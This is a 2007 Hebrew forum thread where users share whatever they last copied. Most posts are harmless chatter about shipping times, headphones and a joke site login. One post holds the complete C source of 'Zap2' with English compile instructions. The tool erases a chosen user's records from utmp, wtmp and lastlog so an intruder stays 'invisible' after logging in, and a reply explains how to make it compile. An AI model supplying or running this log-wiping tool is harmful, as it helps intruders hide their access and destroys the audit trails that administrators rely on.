פורסם 2007 בספטמבר 2218 שנים CROCK 2woot העתקתי אתזה אתמול בכלל X_Xמישהו בפורום הזכיר את השם הזה וזה הזכיר לי שם של משחק... חיפשתי בגוגל ולא מצאתי כלום
פורסם 2007 בספטמבר 2218 שנים HTTP://TECHMVS.TECHNION.AC.IL:100/CICS/WMN/WTGTASH2 אתר של תשלומי שכר לימוד בטכניון וCASIOMAN, הקוד שם ב-C (אחרי כמה שורות של טקסט), בתור מה ניסית להריץ אותו..?
פורסם 2007 בספטמבר 2218 שנים לא מבין בזה במיוחד פשוט העתקתי את השורות ויצרתי מסמך (סקריפט) דרך פיקו והפעלתי עם ./בלינוקס כמובן
פורסם 2007 בספטמבר 2218 שנים VampIre 132 www.sex4free.co.il סיסמא ומשתמש לאתר סתם D: משתמש וסיסמא לונטרילו. :)
פורסם 2007 בספטמבר 2318 שנים Here is the area you will look for right at the top of the file:#define WTMP_NAME "/usr/adm/wtmp"#define UTMP_NAME "/etc/utmp"#define LASTLOG_NAME "/usr/adm/lastlog"Most of the systems I login to are:#define WTMP_NAME "/var/adm/wtmp"#define UTMP_NAME "/var/adm/utmp"#define LASTLOG_NAME "/var/adm/lastlog"But you do your own look around to see were the files are. Also /var/log:is a regular location.Add the log locations for each system, compile the file, and you are all readyto be invisible right after the login using z2If i was to compile a file called z2.c that would zap the log files i wouldtype this:gcc z2.c -o zapThis would give me a file that would exe, called zapIf I just typed : gcc z2.c I would have a file named a.out, that was the executablefile and would have to rename it to zap, or some name i would know by doingthis: mv a.out zapNow I would have a file named zap that was executable instead of a.out.Here is the .c file++++++++++++++++++++++++++++++++++++++++++++++++++++++#include <sys/types.h>#include <stdio.h>#include <unistd.h>#include <sys/file.h>#include <fcntl.h>#include <utmp.h>#include <pwd.h>#include <lastlog.h>#define WTMP_NAME "/usr/adm/wtmp"#define UTMP_NAME "/etc/utmp"#define LASTLOG_NAME "/usr/adm/lastlog"int f;void kill_utmp(who)char *who;{ struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); }}void kill_wtmp(who)char *who;{ struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); }}void kill_lastlog(who)char *who;{ struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who);}main(argc,argv)int argc;char *argv[];{ if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n");}אממ בוא נראה מי יודע מה עושה הסקריפט הזה. אני לא מכיר בידיוק את הקבצים האלה, ולא הרצתי את זה, אך אני מניח שהתוכנית הזו פשוט "מעלימה" משתמש מסויים מהמערכת.עריכה - קזינומן - אתה צריך להוריד(או לשים בהערה) את כל השורות שלא נראות כמו קוד של C(כל מה שלפני ה+++ כולל).
פורסם 2007 בספטמבר 2318 שנים express airmain rulz registerred Hong-Kong'ish airmain sux! uk registered airmail is very nice and fast and doesn't require EMS use... tested and confirmed EA947715319CN מס' מעקב של חבילה בEMS מסין לישראל.
פורסם 2007 בספטמבר 2318 שנים " החיסרון היחיד ובאמת לא משמעותי זה שהחוט של האוזניה השמאלית קצר משמעותית מהאוזניה הימנית אבל זה ככה בהרבה אוזניות. " ביקורת שקראתי על אוזנית צוואר בזאפ שונא אוזניות צוואר
פורסם 2007 בספטמבר 2318 שנים express airmain rulz registerred Hong-Kong'ish airmain sux! uk registered airmail is very nice and fast and doesn't require EMS use... tested and confirmed דואר מבריטניה לארץ? 5 ימים. מארה"ב בpriority mail זה שבוע, מהונג קונג בדואר אוויר רגיל 8 ימים, מקנדה שבוע וחצי בדואר אוויר רגיל(3 בDHL)... זה מה שעולה לי כרגע לראש.
פורסם 2007 בספטמבר 2318 שנים כן, זה בדיוק מה שרשמתי.. רק שהחבילה שלי מבריטניה הגיעה תוך 4 ימים!(+2 עד ששלחו לי אותה)
ארכיון
דיון זה הועבר לארכיון ולא ניתן להוסיף בו תגובות חדשות.